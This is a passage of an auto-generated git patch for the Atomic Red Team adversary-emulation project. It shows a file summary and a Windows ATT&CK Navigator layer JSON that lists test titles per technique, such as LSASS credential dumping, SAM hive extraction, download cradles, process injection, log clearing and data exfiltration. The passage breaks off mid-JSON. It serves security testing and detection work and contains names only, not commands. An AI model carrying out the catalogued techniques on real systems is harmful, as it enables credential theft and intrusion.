+f0287b58-f4bc-40f6-87eb-692e126e7f8f From e9b9f2ed7bbc8e0591ae942abfef08e55499ab89 Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Mon, 26 Feb 2024 15:24:49 +0000 Subject: [PATCH 38/41] Generated docs from job=generate-docs branch=master [ci skip] --- .../art-navigator-layer-windows.json | 2 +- .../art-navigator-layer.json | 2 +- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 3 +- atomics/Indexes/Matrices/windows-matrix.md | 2 +- atomics/Indexes/index.yaml | 239 +++++++++++------- atomics/Indexes/linux-index.yaml | 3 +- atomics/Indexes/windows-index.yaml | 238 ++++++++++------- atomics/T1003.001/T1003.001.md | 48 ++-- atomics/T1003.002/T1003.002.md | 46 ++-- atomics/T1018/T1018.md | 21 +- atomics/T1030/T1030.md | 45 ++++ atomics/T1046/T1046.md | 2 +- atomics/T1059.006/T1059.006.md | 3 +- atomics/T1555.003/T1555.003.md | 50 ++-- 17 files changed, 448 insertions(+), 259 deletions(-) diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index f74835998c..44f72725b3 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"name":"Atomic Red Team (Windows)","versions":{"attack":"13","navigator":"4.8.2","layer":"4.4"},"description":"Atomic Red Team (Windows) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{"platforms":["Windows"]},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1003","score":40,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003/T1003.md"}],"comment":"\n- Gsecdump\n- Credential Dumping with NPPSpy\n- Dump svchost.exe to gather RDP credentials\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list)\n- Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config)\n- Dump Credential Manager using keymgr.dll and rundll32.exe\n"},{"techniqueID":"T1003.001","score":14,"enabled":true,"comment":"\n- Dump LSASS.exe Memory using ProcDump\n- Dump LSASS.exe Memory using comsvcs.dll\n- Dump LSASS.exe Memory using direct system calls and API unhooking\n- Dump LSASS.exe Memory using NanoDump\n- Dump LSASS.exe Memory using Windows Task Manager\n- Offline Credential Theft With Mimikatz\n- LSASS read with pypykatz\n- Dump LSASS.exe Memory using Out-Minidump.ps1\n- Create Mini Dump of LSASS.exe using ProcDump\n- Powershell Mimikatz\n- Dump LSASS with createdump.exe from .Net v5\n- Dump LSASS.exe using imported Microsoft DLLs\n- Dump LSASS.exe using lolbin rdrleakdiag.exe\n- Dump LSASS.exe Memory through Silent Process Exit\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md"}]},{"techniqueID":"T1003.002","score":7,"enabled":true,"comment":"\n- Registry dump of SAM, creds, and secrets\n- Registry parse with pypykatz\n- esentutl.exe SAM copy\n- PowerDump Hashes and Usernames from Registry\n- dump volume shadow copy hives with certutil\n- dump volume shadow copy hives with System.IO.File\n- WinPwn - Loot local Credentials - Dump SAM-File for NTLM Hashes\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.002/T1003.002.md"}]},{"techniqueID":"T1003.003","score":9,"enabled":true,"comment":"\n- Create Volume Shadow Copy with vssadmin\n- Copy NTDS.dit from Volume Shadow Copy\n- Dump Active Directory Database with NTDSUtil\n- Create Volume Shadow Copy with WMI\n- Create Volume Shadow Copy remotely with WMI\n- Create Volume Shadow Copy remotely (WMI) with esentutl\n- Create Volume Shadow Copy with Powershell\n- Create Symlink to Volume Shadow Copy\n- Create Volume Shadow Copy with diskshadow\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.003/T1003.003.md"}]},{"techniqueID":"T1003.004","score":1,"enabled":true,"comment":"\n- Dumping LSA Secrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.004/T1003.004.md"}]},{"techniqueID":"T1003.005","score":1,"enabled":true,"comment":"\n- Cached Credential Dump via Cmdkey\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.005/T1003.005.md"}]},{"techniqueID":"T1003.006","score":2,"enabled":true,"comment":"\n- DCSync (Active Directory)\n- Run DSInternals Get-ADReplAccount\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.006/T1003.006.md"}]},{"techniqueID":"T1005","score":1,"enabled":true,"comment":"\n- Search files of interest and save them to a single zip file (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1005/T1005.md"}]},{"techniqueID":"T1006","score":1,"enabled":true,"comment":"\n- Read volume boot sector via DOS device path (PowerShell)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1006/T1006.md"}]},{"techniqueID":"T1007","score":2,"enabled":true,"comment":"\n- System Service Discovery\n- System Service Discovery - net.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1007/T1007.md"}]},{"techniqueID":"T1010","score":1,"enabled":true,"comment":"\n- List Process Main Windows - C# .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1010/T1010.md"}]},{"techniqueID":"T1012","score":3,"enabled":true,"comment":"\n- Query Registry\n- Query Registry with Powershell cmdlets\n- Enumerate COM Objects in Registry with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1012/T1012.md"}]},{"techniqueID":"T1016","score":7,"enabled":true,"comment":"\n- System Network Configuration Discovery on Windows\n- List Windows Firewall Rules\n- System Network Configuration Discovery (TrickBot Style)\n- List Open Egress Ports\n- Adfind - Enumerate Active Directory Subnet Objects\n- Qakbot Recon\n- DNS Server Discovery Using nslookup\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1016/T1016.md"}]},{"techniqueID":"T1018","score":15,"enabled":true,"comment":"\n- Remote System Discovery - net\n- Remote System Discovery - net group Domain Computers\n- Remote System Discovery - nltest\n- Remote System Discovery - ping sweep\n- Remote System Discovery - arp\n- Remote System Discovery - nslookup\n- Remote System Discovery - adidnsdump\n- Adfind - Enumerate Active Directory Computer Objects\n- Adfind - Enumerate Active Directory Domain Controller Objects\n- Enumerate domain computers within Active Directory using DirectorySearcher\n- Enumerate Active Directory Computers with Get-AdComputer\n- Enumerate Active Directory Computers with ADSISearcher\n- Get-DomainController with PowerView\n- Get-WmiObject to Enumerate Domain Controllers\n- Remote System Discovery - net group Domain Controller\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1018/T1018.md"}]},{"techniqueID":"T1020","score":2,"enabled":true,"comment":"\n- IcedID Botnet HTTP PUT\n- Exfiltration via Encrypted FTP\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1020/T1020.md"}]},{"techniqueID":"T1021","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021/T1021.md"}]},{"techniqueID":"T1021.001","score":4,"enabled":true,"comment":"\n- RDP to DomainController\n- Changing RDP Port to Non Standard Port via Powershell\n- Changing RDP Port to Non Standard Port via Command_Prompt\n- Disable NLA for RDP via Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.001/T1021.001.md"}]},{"techniqueID":"T1021.002","score":4,"enabled":true,"comment":"\n- Map admin share\n- Map Admin Share PowerShell\n- Copy and Execute File with PsExec\n- Execute command writing output to local Admin Share\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.002/T1021.002.md"}]},{"techniqueID":"T1021.003","score":2,"enabled":true,"comment":"\n- PowerShell Lateral Movement using MMC20\n- PowerShell Lateral Movement Using Excel Application Object\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.003/T1021.003.md"}]},{"techniqueID":"T1021.006","score":3,"enabled":true,"comment":"\n- Enable Windows Remote Management\n- Remote Code Execution with PS Credentials Using Invoke-Command\n- WinRM Access with Evil-WinRM\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1021.006/T1021.006.md"}]},{"techniqueID":"T1027","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md"}],"comment":"\n- Execute base64-encoded PowerShell\n- Execute base64-encoded PowerShell from Windows Registry\n- Execution from Compressed File\n- DLP Evasion via Sensitive Data in VBA Macro over email\n- DLP Evasion via Sensitive Data in VBA Macro over HTTP\n- Obfuscated Command in PowerShell\n- Obfuscated Command Line using special Unicode characters\n- Snake Malware Encrypted crmlog file\n- Execution from Compressed JScript File\n"},{"techniqueID":"T1027.004","score":2,"enabled":true,"comment":"\n- Compile After Delivery using csc.exe\n- Dynamic C# Compile\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.004/T1027.004.md"}]},{"techniqueID":"T1027.006","score":1,"enabled":true,"comment":"\n- HTML Smuggling Remote Payload\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.006/T1027.006.md"}]},{"techniqueID":"T1027.007","score":1,"enabled":true,"comment":"\n- Dynamic API Resolution-Ninja-syscall\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027.007/T1027.007.md"}]},{"techniqueID":"T1033","score":6,"enabled":true,"comment":"\n- System Owner/User Discovery\n- Find computers where user has session - Stealth mode (PowerView)\n- User Discovery With Env Vars PowerShell Script\n- GetCurrent User with PowerShell Script\n- System Discovery - SocGholish whoami\n- System Owner/User Discovery Using Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1033/T1033.md"}]},{"techniqueID":"T1036","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036/T1036.md"}],"comment":"\n- System File Copied to Unusual Location\n- Malware Masquerading and Execution from Zip File\n"},{"techniqueID":"T1036.003","score":8,"enabled":true,"comment":"\n- Masquerading as Windows LSASS process\n- Masquerading - cscript.exe running as notepad.exe\n- Masquerading - wscript.exe running as svchost.exe\n- Masquerading - powershell.exe running as taskhostw.exe\n- Masquerading - non-windows exe running as windows exe\n- Masquerading - windows exe running as different windows exe\n- Malicious process Masquerading as LSM.exe\n- File Extension Masquerading\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.003/T1036.003.md"}]},{"techniqueID":"T1036.004","score":2,"enabled":true,"comment":"\n- Creating W32Time similar named service using schtasks\n- Creating W32Time similar named service using sc\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.004/T1036.004.md"}]},{"techniqueID":"T1036.005","score":1,"enabled":true,"comment":"\n- Masquerade as a built-in system executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1036.005/T1036.005.md"}]},{"techniqueID":"T1037","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037/T1037.md"}]},{"techniqueID":"T1037.001","score":1,"enabled":true,"comment":"\n- Logon Scripts\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1037.001/T1037.001.md"}]},{"techniqueID":"T1039","score":2,"enabled":true,"comment":"\n- Copy a sensitive File over Administrative share with copy\n- Copy a sensitive File over Administrative share with Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1039/T1039.md"}]},{"techniqueID":"T1040","score":5,"enabled":true,"comment":"\n- Packet Capture Windows Command Prompt\n- Windows Internal Packet Capture\n- Windows Internal pktmon capture\n- Windows Internal pktmon set filter\n- PowerShell Network Sniffing\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md"}]},{"techniqueID":"T1041","score":2,"enabled":true,"comment":"\n- C2 Data Exfiltration\n- Text Based Data Exfiltration using DNS subdomains\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1041/T1041.md"}]},{"techniqueID":"T1046","score":7,"enabled":true,"comment":"\n- Port Scan NMap for Windows\n- Port Scan using python\n- WinPwn - spoolvulnscan\n- WinPwn - MS17-10\n- WinPwn - bluekeep\n- WinPwn - fruit\n- Port-Scanning /24 Subnet with PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1047","score":10,"enabled":true,"comment":"\n- WMI Reconnaissance Users\n- WMI Reconnaissance Processes\n- WMI Reconnaissance Software\n- WMI Reconnaissance List Remote Services\n- WMI Execute Local Process\n- WMI Execute Remote Process\n- Create a Process using WMI Query and an Encoded Command\n- Create a Process using obfuscated Win32_Process\n- WMI Execute rundll32\n- Application uninstall using WMIC\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1047/T1047.md"}]},{"techniqueID":"T1048","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048/T1048.md"}],"comment":"\n- DNSExfiltration (doh)\n"},{"techniqueID":"T1048.002","score":1,"enabled":true,"comment":"\n- Exfiltrate data HTTPS using curl windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.002/T1048.002.md"}]},{"techniqueID":"T1048.003","score":5,"enabled":true,"comment":"\n- Exfiltration Over Alternative Protocol - ICMP\n- Exfiltration Over Alternative Protocol - HTTP\n- Exfiltration Over Alternative Protocol - SMTP\n- MAZE FTP Upload\n- Exfiltration Over Alternative Protocol - FTP - Rclone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1048.003/T1048.003.md"}]},{"techniqueID":"T1049","score":3,"enabled":true,"comment":"\n- System Network Connections Discovery\n- System Network Connections Discovery with PowerShell\n- System Discovery using SharpView\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1049/T1049.md"}]},{"techniqueID":"T1053","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At.exe Scheduled task\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.005","score":10,"enabled":true,"comment":"\n- Scheduled Task Startup Script\n- Scheduled task Local\n- Scheduled task Remote\n- Powershell Cmdlet Scheduled Task\n- Task Scheduler via VBA\n- WMI Invoke-CimMethod Scheduled Task\n- Scheduled Task Executing Base64 Encoded Commands From Registry\n- Import XML Schedule Task with Hidden Attribute\n- PowerShell Modify A Scheduled Task\n- Scheduled Task (\"Ghost Task\") via Registry Key Manipulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md"}]},{"techniqueID":"T1055","score":26,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055/T1055.md"}],"comment":"\n- Shellcode execution via VBA\n- Remote Process Injection in LSASS via mimikatz\n- Section View Injection\n- Dirty Vanity process Injection\n- Read-Write-Execute process Injection\n- Process Injection with Go using UuidFromStringA WinAPI\n- Process Injection with Go using EtwpCreateEtwThread WinAPI\n- Remote Process Injection with Go using RtlCreateUserThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI\n- Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)\n- Process Injection with Go using CreateThread WinAPI\n- Process Injection with Go using CreateThread WinAPI (Natively)\n- UUID custom process Injection\n"},{"techniqueID":"T1055.001","score":2,"enabled":true,"comment":"\n- Process Injection via mavinject.exe\n- WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.001/T1055.001.md"}]},{"techniqueID":"T1055.002","score":1,"enabled":true,"comment":"\n- Portable Executable Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.002/T1055.002.md"}]},{"techniqueID":"T1055.003","score":1,"enabled":true,"comment":"\n- Thread Execution Hijacking\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.003/T1055.003.md"}]},{"techniqueID":"T1055.004","score":3,"enabled":true,"comment":"\n- Process Injection via C#\n- EarlyBird APC Queue Injection in Go\n- Remote Process Injection with Go using NtQueueApcThreadEx WinAPI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.004/T1055.004.md"}]},{"techniqueID":"T1055.011","score":1,"enabled":true,"comment":"\n- Process Injection via Extra Window Memory (EWM) x64 executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.011/T1055.011.md"}]},{"techniqueID":"T1055.012","score":4,"enabled":true,"comment":"\n- Process Hollowing using PowerShell\n- RunPE via VBA\n- Process Hollowing in Go using CreateProcessW WinAPI\n- Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.012/T1055.012.md"}]},{"techniqueID":"T1055.015","score":1,"enabled":true,"comment":"\n- Process injection ListPlanting\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1055.015/T1055.015.md"}]},{"techniqueID":"T1056","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/T1056.md"}]},{"techniqueID":"T1056.001","score":1,"enabled":true,"comment":"\n- Input Capture\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.001/T1056.001.md"}]},{"techniqueID":"T1056.002","score":1,"enabled":true,"comment":"\n- PowerShell - Prompt User for Password\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.002/T1056.002.md"}]},{"techniqueID":"T1056.004","score":1,"enabled":true,"comment":"\n- Hook PowerShell TLS Encrypt/Decrypt Messages\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056.004/T1056.004.md"}]},{"techniqueID":"T1057","score":5,"enabled":true,"comment":"\n- Process Discovery - tasklist\n- Process Discovery - Get-Process\n- Process Discovery - get-wmiObject\n- Process Discovery - wmic process\n- Discover Specific Process - tasklist\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1057/T1057.md"}]},{"techniqueID":"T1059","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059/T1059.md"}]},{"techniqueID":"T1059.001","score":22,"enabled":true,"comment":"\n- Mimikatz\n- Run BloodHound from local disk\n- Run Bloodhound from Memory using Download Cradle\n- Mimikatz - Cradlecraft PsSendKeys\n- Invoke-AppPathBypass\n- Powershell MsXml COM object - with prompt\n- Powershell XML requests\n- Powershell invoke mshta.exe download\n- Powershell Invoke-DownloadCradle\n- PowerShell Fileless Script Execution\n- NTFS Alternate Data Stream Access\n- PowerShell Session Creation and Use\n- ATHPowerShellCommandLineParameter -Command parameter variations\n- ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations\n- ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments\n- PowerShell Command Execution\n- PowerShell Invoke Known Malicious Cmdlets\n- PowerUp Invoke-AllChecks\n- Abuse Nslookup with DNS Records\n- SOAPHound - Dump BloodHound Data\n- SOAPHound - Build Cache\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.001/T1059.001.md"}]},{"techniqueID":"T1059.003","score":6,"enabled":true,"comment":"\n- Create and Execute Batch Script\n- Writes text to a file and displays it.\n- Suspicious Execution via Windows Command Shell\n- Simulate BlackByte Ransomware Print Bombing\n- Command Prompt read contents from CMD file and execute\n- Command prompt writing script to file then executes it\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.003/T1059.003.md"}]},{"techniqueID":"T1059.005","score":3,"enabled":true,"comment":"\n- Visual Basic script execution to gather local computer information\n- Encoded VBS code execution\n- Extract Memory via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.005/T1059.005.md"}]},{"techniqueID":"T1059.007","score":2,"enabled":true,"comment":"\n- JScript execution to gather local computer information via cscript\n- JScript execution to gather local computer information via wscript\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1059.007/T1059.007.md"}]},{"techniqueID":"T1069","score":19,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":5,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Local)\n- Permission Groups Discovery PowerShell (Local)\n- SharpHound3 - LocalAdmin\n- Wmic Group Discovery\n- WMIObject Group Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1069.002","score":14,"enabled":true,"comment":"\n- Basic Permission Groups Discovery Windows (Domain)\n- Permission Groups Discovery PowerShell (Domain)\n- Elevated group enumeration using net group (Domain)\n- Find machines where user has local admin access (PowerView)\n- Find local admins on all machines in domain (PowerView)\n- Find Local Admins via Group Policy (PowerView)\n- Enumerate Users Not Requiring Pre Auth (ASRepRoast)\n- Adfind - Query Active Directory Groups\n- Enumerate Active Directory Groups with Get-AdGroup\n- Enumerate Active Directory Groups with ADSISearcher\n- Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)\n- Get-DomainGroupMember with PowerView\n- Get-DomainGroup with PowerView\n- Active Directory Enumeration with LDIFDE\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.002/T1069.002.md"}]},{"techniqueID":"T1070","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070/T1070.md"}],"comment":"\n- Indicator Removal using FSUtil\n- Indicator Manipulation using FSUtil\n"},{"techniqueID":"T1070.001","score":3,"enabled":true,"comment":"\n- Clear Logs\n- Delete System Logs Using Clear-EventLog\n- Clear Event Logs via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.001/T1070.001.md"}]},{"techniqueID":"T1070.003","score":3,"enabled":true,"comment":"\n- Prevent Powershell History Logging\n- Clear Powershell History by Deleting History File\n- Set Custom AddToHistoryHandler to Avoid History File Logging\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.003/T1070.003.md"}]},{"techniqueID":"T1070.004","score":6,"enabled":true,"comment":"\n- Delete a single file - Windows cmd\n- Delete an entire folder - Windows cmd\n- Delete a single file - Windows PowerShell\n- Delete an entire folder - Windows PowerShell\n- Delete Prefetch File\n- Delete TeamViewer Log Files\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.004/T1070.004.md"}]},{"techniqueID":"T1070.005","score":5,"enabled":true,"comment":"\n- Add Network Share\n- Remove Network Share\n- Remove Network Share PowerShell\n- Disable Administrative Share Creation at Startup\n- Remove Administrative Shares\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.005/T1070.005.md"}]},{"techniqueID":"T1070.006","score":4,"enabled":true,"comment":"\n- Windows - Modify file creation timestamp with PowerShell\n- Windows - Modify file last modified timestamp with PowerShell\n- Windows - Modify file last access timestamp with PowerShell\n- Windows - Timestomp a File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.006/T1070.006.md"}]},{"techniqueID":"T1070.008","score":2,"enabled":true,"comment":"\n- Copy and Delete Mailbox Data on Windows\n- Copy and Modify Mailbox Data on Windows\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1070.008/T1070.008.md"}]},{"techniqueID":"T1071","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071/T1071.md"}]},{"techniqueID":"T1071.001","score":2,"enabled":true,"comment":"\n- Malicious User Agents - Powershell\n- Malicious User Agents - CMD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.001/T1071.001.md"}]},{"techniqueID":"T1071.004","score":4,"enabled":true,"comment":"\n- DNS Large Query Volume\n- DNS Regular Beaconing\n- DNS Long Domain Query\n- DNS C2\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/T1071.004.md"}]},{"techniqueID":"T1072","score":2,"enabled":true,"comment":"\n- Radmin Viewer Utility\n- PDQ Deploy RAT\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1072/T1072.md"}]},{"techniqueID":"T1074","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074/T1074.md"}]},{"techniqueID":"T1074.001","score":2,"enabled":true,"comment":"\n- Stage data from Discovery.bat\n- Zip a Folder with PowerShell for Staging in Temp\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1074.001/T1074.001.md"}]},{"techniqueID":"T1078","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.001","score":2,"enabled":true,"comment":"\n- Enable Guest account with RDP capability and admin privileges\n- Activate Guest Account\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.001/T1078.001.md"}]},{"techniqueID":"T1078.003","score":3,"enabled":true,"comment":"\n- Create local account with admin privileges\n- WinPwn - Loot local Credentials - powerhell kittie\n- WinPwn - Loot local Credentials - Safetykatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md"}]},{"techniqueID":"T1082","score":20,"enabled":true,"comment":"\n- System Information Discovery\n- Hostname Discovery (Windows)\n- Windows MachineGUID Discovery\n- Griffon Recon\n- Environment variables discovery on windows\n- WinPwn - winPEAS\n- WinPwn - itm4nprivesc\n- WinPwn - Powersploits privesc checks\n- WinPwn - General privesc checks\n- WinPwn - GeneralRecon\n- WinPwn - Morerecon\n- WinPwn - RBCD-Check\n- WinPwn - PowerSharpPack - Watson searching for missing windows patches\n- WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors\n- WinPwn - PowerSharpPack - Seatbelt\n- System Information Discovery with WMIC\n- Driver Enumeration using DriverQuery\n- System Information Discovery\n- Check computer location\n- BIOS Information Discovery through Registry\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1083","score":4,"enabled":true,"comment":"\n- File and Directory Discovery (cmd.exe)\n- File and Directory Discovery (PowerShell)\n- Simulating MAZE Directory Enumeration\n- Launch DirLister Executable\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1083/T1083.md"}]},{"techniqueID":"T1087","score":25,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087/T1087.md"}]},{"techniqueID":"T1087.001","score":3,"enabled":true,"comment":"\n- Enumerate all accounts on Windows (Local)\n- Enumerate all accounts via PowerShell (Local)\n- Enumerate logged on users via CMD (Local)\n","links":[{"label":"View 